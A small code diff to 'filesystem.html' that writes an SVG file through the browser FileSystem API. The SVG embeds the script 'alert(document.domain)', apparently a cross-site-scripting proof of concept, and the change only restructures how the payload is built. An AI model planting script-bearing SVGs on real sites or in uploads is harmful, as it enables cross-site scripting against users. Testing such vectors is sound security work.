--- a/filesystem.html
+++ b/filesystem.html
@@ -19,17 +19,14 @@
 
                     // Buat writer untuk menulis ke file
                     fileEntry.createWriter(function (fileWriter) {
-                        // Perbaiki: Pastikan HTML dibungkus dalam string dengan benar
-                        let svgContent = `
+                        let blob = new Blob([`
 <svg version="1.1" xmlns="http://www.w3.org/2000/svg">
    <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
    <script type="text/javascript">
       alert(document.domain);
    </script>
 </svg>
-                        `;
-
-                        let blob = new Blob([svgContent], { type: "image/svg+xml" }); // MIME type untuk SVG
+                        `], { type: "image/svg+xml" }); // MIME type untuk SVG
 
                         fileWriter.onwriteend = function () {
                             console.log("File berhasil ditulis:", fileEntry.toURL());
